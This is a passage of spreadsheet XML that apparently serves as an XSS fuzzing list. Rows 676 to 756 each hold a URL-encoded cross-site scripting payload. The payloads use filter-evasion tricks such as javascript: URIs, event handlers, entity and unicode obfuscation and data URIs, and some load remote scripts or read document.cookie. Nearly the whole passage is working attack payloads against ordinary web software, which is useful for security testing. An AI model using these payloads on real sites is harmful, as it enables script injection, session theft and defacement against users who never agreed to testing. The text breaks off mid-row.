        <v>567</v>
      </c>
      <c r="B676" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20content%3D%22%26NewLine%3B%201%20%26NewLine%3B%3B%20JAVASCRIPT%26colon%3B%20alert%281%29%22%20http-equiv%3D%22refresh%22%2F%3E</v>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="3" t="s">
        <v>568</v>
      </c>
      <c r="B677" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20xlink%3Ahref%3Ddata%26colon%3B%2Cwindow.open%28%27https%3A%2F%2Fwww.google.com%2F%27%29%3E%3C%2Fscript</v>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="3" t="s">
        <v>569</v>
      </c>
      <c r="B678" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20x%3Ahref%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="3" t="s">
        <v>570</v>
      </c>
      <c r="B679" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Aconfirm%281%29%22%3E</v>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="3" t="s">
        <v>571</v>
      </c>
      <c r="B680" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Djavascript%26colon%3Balert%26lpar%3Bdocument%26period%3Blocation%26rpar%3B%3E</v>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="3" t="s">
        <v>572</v>
      </c>
      <c r="B681" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ca%20href%3D%22javascript%3A%5Cu0061lert%26%23x28%3B1%26%23x29%3B%22%3EX</v>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="3" t="s">
        <v>573</v>
      </c>
      <c r="B682" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fscript%3E%3Cimg%2F%2A%2500%2Fsrc%3D%22worksinchrome%26colon%3Bprompt%26%23x28%3B1%26%23x29%3B%22%2F%2500%2A%2Fonerror%3D%27eval%28src%29%27%3E</v>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="3" t="s">
        <v>574</v>
      </c>
      <c r="B683" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2F%26%2309%3B%26%2310%3B%26%2311%3B%20src%3D%60%7E%60%20onerror%3Dprompt%281%29%3E</v>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="3" t="s">
        <v>575</v>
      </c>
      <c r="B684" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ciframe%20%26%2309%3B%26%2310%3B%26%2311%3B%20src%3D%22javascript%26%2358%3Balert%281%29%22%26%2311%3B%26%2310%3B%26%2309%3B%3B%3E</v>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="3" t="s">
        <v>576</v>
      </c>
      <c r="B685" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Aapplication%2Fx-x509-user-cert%3B%26NewLine%3Bbase64%26NewLine%3B%2CPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3D%3D%22%26%2309%3B%26%2310%3B%26%2311%3B%3EX%3C%2Fa</v>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="3" t="s">
        <v>577</v>
      </c>
      <c r="B686" s="4" t="str">
        <f t="shared" si="1"/>
        <v>http%3A%2F%2Fwww.google%3Cscript%20.com%3Ealert%28document.location%29%3C%2Fscript</v>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="3" t="s">
        <v>578</v>
      </c>
      <c r="B687" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%26%2332%3Bhref%26%2361%3B%26%2391%3B%26%2300%3B%26%2393%3B%22%26%2300%3B%20onmouseover%3Dprompt%26%2340%3B1%26%2341%3B%26%2347%3B%26%2347%3B%22%3EXYZ%3C%2Fa</v>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="3" t="s">
        <v>579</v>
      </c>
      <c r="B688" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%3D%40%26%2332%3B%26%2313%3B%20onerror%20%3D%20prompt%28%27%26%2349%3B%27%29</v>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="3" t="s">
        <v>580</v>
      </c>
      <c r="B689" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%2Fonload%3Dprompt%26%2340%3B%27%26%2388%3B%26%2383%3B%26%2383%3B%27%26%2341%3B</v>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="3" t="s">
        <v>581</v>
      </c>
      <c r="B690" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%5E__%5E%3Ealert%28String.fromCharCode%2849%29%29%3C%2Fscript%20%5E__%5E</v>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="3" t="s">
        <v>582</v>
      </c>
      <c r="B691" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fstyle%20%26%2332%3B%3E%3Cscript%20%26%2332%3B%20%3A-%28%3E%2F%2A%2A%2Falert%28document.location%29%2F%2A%2A%2F%3C%2Fscript%20%26%2332%3B%20%3A-%28</v>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="3" t="s">
        <v>583</v>
      </c>
      <c r="B692" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2300%3B%3C%2Fform%3E%3Cinput%20type%26%2361%3B%22date%22%20onfocus%3D%22alert%281%29%22%3E</v>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="3" t="s">
        <v>584</v>
      </c>
      <c r="B693" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ctextarea%20%26%2313%3B%20onkeyup%3D%27%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%26%23x28%3B1%26%23x29%3B%27%3E</v>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="3" t="s">
        <v>585</v>
      </c>
      <c r="B694" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%2F%2A%2A%2A%2F%3E%2F%2A%2A%2A%2Fconfirm%28%27%5CuFF41%5CuFF4C%5CuFF45%5CuFF52%5CuFF54%5Cu1455%5CuFF11%5Cu1450%27%29%2F%2A%2A%2A%2F%3C%2Fscript%20%2F%2A%2A%2A%2F</v>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="3" t="s">
        <v>586</v>
      </c>
      <c r="B695" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20srcdoc%3D%27%26lt%3Bbody%20onload%3Dprompt%26lpar%3B1%26rpar%3B%26gt%3B%27%3E</v>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="3" t="s">
        <v>587</v>
      </c>
      <c r="B696" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%3Avoid%280%29%22%20onmouseover%3D%26NewLine%3Bjavascript%3Aalert%281%29%26NewLine%3B%3EX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="3" t="s">
        <v>588</v>
      </c>
      <c r="B697" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%7E%7E%7E%3Ealert%280%250%29%3C%2Fscript%20%7E%7E%7E%3E</v>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="3" t="s">
        <v>589</v>
      </c>
      <c r="B698" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%2Fonload%3D%26lt%3B%21--%26%2309%3B%26gt%3B%26%2310%3Balert%26%2310%3B%26lpar%3B1%26rpar%3B%3E</v>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="3" t="s">
        <v>590</v>
      </c>
      <c r="B699" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2F%2F%2Fstyle%2F%2F%2F%3E%3Cspan%20%252F%20onmousemove%3D%27alert%26lpar%3B1%26rpar%3B%27%3ESPAN</v>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="3" t="s">
        <v>591</v>
      </c>
      <c r="B700" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%3D%27http%3A%2F%2Fi.imgur.com%2FP8mL8.jpg%27%20onmouseover%3D%26Tab%3Bprompt%281%29</v>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="3" t="s">
        <v>592</v>
      </c>
      <c r="B701" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2334%3B%26%2362%3B%3Csvg%3E%3Cstyle%3E%7B-o-link-source%26colon%3B%27%3Cbody%2Fonload%3Dconfirm%281%29%3E%27</v>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="3" t="s">
        <v>593</v>
      </c>
      <c r="B702" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2313%3B%3Cblink%2F%26%2313%3B%20onmouseover%3Dpr%26%23x6F%3Bmp%26%23116%3B%281%29%3EOnMouseOver%20%7BFirefox%20%26%20Opera%7D</v>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="3" t="s">
        <v>594</v>
      </c>
      <c r="B703" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmarquee%20onstart%3D%27javascript%3Aalert%26%23x28%3B1%26%23x29%3B%27%3E%5E__%5E</v>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="3" t="s">
        <v>595</v>
      </c>
      <c r="B704" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%2Fstyle%3D%22width%3Aexpression%28confirm%281%29%29%22%3EX%3C%2Fdiv%3E%20%7BIE7%7D</v>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="3" t="s">
        <v>596</v>
      </c>
      <c r="B705" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2F%2500%2F%20src%3DjavaSCRIPT%26colon%3Balert%281%29</v>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="3" t="s">
        <v>597</v>
      </c>
      <c r="B706" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2F%3Cform%2Faction%3Djavascript%26%23x3A%3Balert%26lpar%3Bdocument%26period%3Bcookie%26rpar%3B%3E%3Cinput%2Ftype%3D%27submit%27%3E%2F%2F</v>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="3" t="s">
        <v>598</v>
      </c>
      <c r="B707" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2Aiframe%2Fsrc%2A%2F%3Ciframe%2Fsrc%3D%22%3Ciframe%2Fsrc%3D%40%22%2Fonload%3Dprompt%281%29%20%2F%2Aiframe%2Fsrc%2A%2F%3E</v>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="3" t="s">
        <v>599</v>
      </c>
      <c r="B708" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2F%7C%5C%5C%20%3Cscript%20%2F%2F%7C%5C%5C%20src%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%3E%20%2F%2F%7C%5C%5C%20%3C%2Fscript%20%2F%2F%7C%5C%5C</v>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="3" t="s">
        <v>600</v>
      </c>
      <c r="B709" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Ffont%3E%2F%3Csvg%3E%3Cstyle%3E%7Bsrc%26%23x3A%3B%27%3Cstyle%2Fonload%3Dthis.onload%3Dconfirm%281%29%3E%27%3C%2Ffont%3E%2F%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="3" t="s">
        <v>601</v>
      </c>
      <c r="B710" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%2Fhref%3D%22javascript%3A%26%2313%3B%20javascript%3Aprompt%281%29%22%3E%3Cinput%20type%3D%22X%22%3E</v>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="3" t="s">
        <v>602</v>
      </c>
      <c r="B711" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fplaintext%5C%3E%3C%2F%7C%5C%3E%3Cplaintext%2Fonmouseover%3Dprompt%281%29</v>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="3" t="s">
        <v>603</v>
      </c>
      <c r="B712" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fsvg%3E%27%27%3Csvg%3E%3Cscript%20%27AQuickBrownFoxJumpsOverTheLazyDog%27%3Ealert%26%23x28%3B1%26%23x29%3B%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="3" t="s">
        <v>604</v>
      </c>
      <c r="B713" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%26colon%3B%5Cu0061%26%23x6C%3B%26%23101%2572t%26lpar%3B1%26rpar%3B%22%3E%3Cbutton%3E</v>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="3" t="s">
        <v>605</v>
      </c>
      <c r="B714" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20onmouseover%3D%27alert%26lpar%3B1%26rpar%3B%27%3EDIV%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="3" t="s">
        <v>660</v>
      </c>
      <c r="B715" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20style%3D%22xg-p%3Aabsolute%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%22%20onmouseover%3D%22prompt%281%29%22%3E</v>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="3" t="s">
        <v>607</v>
      </c>
      <c r="B716" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22jAvAsCrIpT%26colon%3Balert%26lpar%3B1%26rpar%3B%22%3EX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="3" t="s">
        <v>608</v>
      </c>
      <c r="B717" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%22http%3A%2F%2Fcorkami.googlecode.com%2Fsvn%2F%21svn%2Fbc%2F480%2Ftrunk%2Fmisc%2Fpdf%2Fhelloworld_js_X.pdf%22%3E</v>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="3" t="s">
        <v>609</v>
      </c>
      <c r="B718" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3D%22http%3A%2F%2Fcorkami.googlecode.com%2Fsvn%2F%21svn%2Fbc%2F480%2Ftrunk%2Fmisc%2Fpdf%2Fhelloworld_js_X.pdf%22%3E</v>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="3" t="s">
        <v>610</v>
      </c>
      <c r="B719" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvar%20onmouseover%3D%22prompt%281%29%22%3EOn%20Mouse%20Over%3C%2Fvar%3E</v>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="3" t="s">
        <v>611</v>
      </c>
      <c r="B720" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3Djavascript%26colon%3Balert%26lpar%3Bdocument%26period%3Bcookie%26rpar%3B%3EClick%20Here%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="3" t="s">
        <v>612</v>
      </c>
      <c r="B721" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22%2F%22%20%3D_%3D%22%20title%3D%22onerror%3D%27prompt%281%29%27%22%3E</v>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="3" t="s">
        <v>613</v>
      </c>
      <c r="B722" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%25%3C%21--%27%25%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%20--%3E</v>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="3" t="s">
        <v>614</v>
      </c>
      <c r="B723" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3Atext%2Fjavascript%2Calert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="3" t="s">
        <v>615</v>
      </c>
      <c r="B724" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%20%5C%2F%5C%2Fonload%20%3D%20prompt%281%29</v>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="3" t="s">
        <v>616</v>
      </c>
      <c r="B725" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fonreadystatechange%3Dalert%281%29</v>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="3" t="s">
        <v>617</v>
      </c>
      <c r="B726" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%2Fonload%3Dalert%281%29</v>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="3" t="s">
        <v>618</v>
      </c>
      <c r="B727" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20value%3D%3C%3E%3Ciframe%2Fsrc%3Djavascript%3Aconfirm%281%29</v>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="3" t="s">
        <v>619</v>
      </c>
      <c r="B728" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20type%3D%22text%22%20value%3D%60%60%20%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="3" t="s">
        <v>620</v>
      </c>
      <c r="B729" s="4" t="str">
        <f t="shared" si="1"/>
        <v>http%3A%2F%2Fwww.%3Cscript%3Ealert%281%29%3C%2Fscript%20.com</v>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="3" t="s">
        <v>621</v>
      </c>
      <c r="B730" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dj%26NewLine%3B%26Tab%3Ba%26NewLine%3B%26Tab%3B%26Tab%3Bv%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3Ba%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bs%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bc%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Br%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bi%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bp%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bt%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26colon%3Ba%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bl%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Be%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Br%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bt%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B28%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B1%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%2529%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="3" t="s">
        <v>622</v>
      </c>
      <c r="B731" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20%3F%3Ealert%281%29</v>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="3" t="s">
        <v>623</v>
      </c>
      <c r="B732" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dj%26Tab%3Ba%26Tab%3Bv%26Tab%3Ba%26Tab%3Bs%26Tab%3Bc%26Tab%3Br%26Tab%3Bi%26Tab%3Bp%26Tab%3Bt%26Tab%3B%3Aa%26Tab%3Bl%26Tab%3Be%26Tab%3Br%26Tab%3Bt%26Tab%3B%2528%26Tab%3B1%26Tab%3B%2529%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="3" t="s">
        <v>624</v>
      </c>
      <c r="B733" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%60xx%3Axx%60onerror%3Dalert%281%29%3E</v>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="3" t="s">
        <v>626</v>
      </c>
      <c r="B734" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Bjavascript%26colon%3Balert%281%29%22%2F%3E</v>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="3" t="s">
        <v>627</v>
      </c>
      <c r="B735" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmath%3E%3Ca%20xlink%3Ahref%3D%22%2F%2Fjsfiddle.net%2Ft846h%2F%22%3Eclick</v>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="3" t="s">
        <v>628</v>
      </c>
      <c r="B736" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20code%3D%22http%3A%2F%2Fbusinessinfo.co.uk%2Flabs%2Fxss%2Fxss.swf%22%20allowscriptaccess%3Dalways%3E</v>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="3" t="s">
        <v>629</v>
      </c>
      <c r="B737" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20contentScriptType%3Dtext%2Fvbs%3E%3Cscript%3EMsgBox%2B1</v>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="3" t="s">
        <v>630</v>
      </c>
      <c r="B738" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Atext%2Fhtml%3Bbase64_%2C%3Csvg%2Fonload%3D%5Cu0061%26%23x6C%3B%26%23101%2572t%281%29%3E%22%3EX%3C%2Fa</v>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="3" t="s">
        <v>631</v>
      </c>
      <c r="B739" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fonreadystatechange%3D%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%27%5Cu0061%27%29%20worksinIE%3E</v>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="3" t="s">
        <v>632</v>
      </c>
      <c r="B740" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%7E%27%5Cu0061%27%20%3B%20%5Cu0074%5Cu0068%5Cu0072%5Cu006F%5Cu0077%20%7E%20%5Cu0074%5Cu0068%5Cu0069%5Cu0073.%20%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%7E%27%5Cu0061%27%29%3C%2Fscript%20U%2B</v>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="3" t="s">
        <v>633</v>
      </c>
      <c r="B741" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3D%22data%26colon%3Btext%252Fj%5Cu0061v%5Cu0061script%2C%5Cu0061lert%28%27%5Cu0061%27%29%22%3E%3C%2Fscript%20a%3D%5Cu0061%20%26%20%2F%3D%252F</v>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="3" t="s">
        <v>634</v>
      </c>
      <c r="B742" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3Ddata%26colon%3Btext%2Fj%5Cu0061v%5Cu0061%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%2C%5Cu0061%256C%2565%2572%2574%28%2FXSS%2F%29%3E%3C%2Fscript</v>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="3" t="s">
        <v>635</v>
      </c>
      <c r="B743" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3Djavascript%26colon%3B%5Cu0061%26%23x6C%3B%26%23101%2572t%281%29%3E</v>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="3" t="s">
        <v>636</v>
      </c>
      <c r="B744" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%2B-%2B-1-%2B-%2Balert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="3" t="s">
        <v>637</v>
      </c>
      <c r="B745" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%2Fonload%3D%26lt%3B%21--%26gt%3B%26%2310alert%281%29%3E</v>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="3" t="s">
        <v>638</v>
      </c>
      <c r="B746" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20itworksinallbrowsers%3E%2F%2A%3Cscript%2A%20%2A%2Falert%281%29%3C%2Fscript</v>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="3" t="s">
        <v>639</v>
      </c>
      <c r="B747" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%20%3Fitworksonchrome%3F%5C%2Fonerror%20%3D%20alert%281%29</v>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="3" t="s">
        <v>640</v>
      </c>
      <c r="B748" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%3E%2F%2F%26NewLine%3Bconfirm%281%29%3B%3C%2Fscript%20%3C%2Fsvg%3E</v>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="3" t="s">
        <v>641</v>
      </c>
      <c r="B749" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20onlypossibleinopera%3A-%29%3E%20alert%281%29</v>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="3" t="s">
        <v>642</v>
      </c>
      <c r="B750" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20aaaaaaaaa%20aaaaaaaaaa%20href%3Dj%26%2397v%26%2397script%26%23x3A%3B%26%2397lert%281%29%3EClickMe</v>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="3" t="s">
        <v>643</v>
      </c>
      <c r="B751" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20x%3E%20alert%281%29%20%3C%2Fscript%201%3D2</v>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="3" t="s">
        <v>644</v>
      </c>
      <c r="B752" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3E%20style%3D%22x%3A%22%3E</v>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="3" t="s">
        <v>645</v>
      </c>
      <c r="B753" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C--%60%3Cimg%2Fsrc%3D%60%20onerror%3Dalert%281%29%3E%20--%21%3E</v>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="3" t="s">
        <v>646</v>
      </c>
      <c r="B754" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3D%26%23100%26%2397%26%23116%26%2397%3Atext%2F%26%23x6a%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x000070%26%23x074%2C%26%23x0061%3B%26%23x06c%3B%26%23x0065%3B%26%23x00000072%3B%26%23x00074%3B%281%29%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="3" t="s">
        <v>661</v>
      </c>
      <c r="B755" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22xg-p%3Aabsolute%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%22%20onmouseover%3D%22prompt%281%29%22%20onclick%3D%22alert%281%29%22%3Ex%3C%2Fbutton%3E</v>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="3" t="s">
        <v>648</v>
      </c>
      <c r="B756" s="4" t="str">
        <f t="shared" si="1"/>
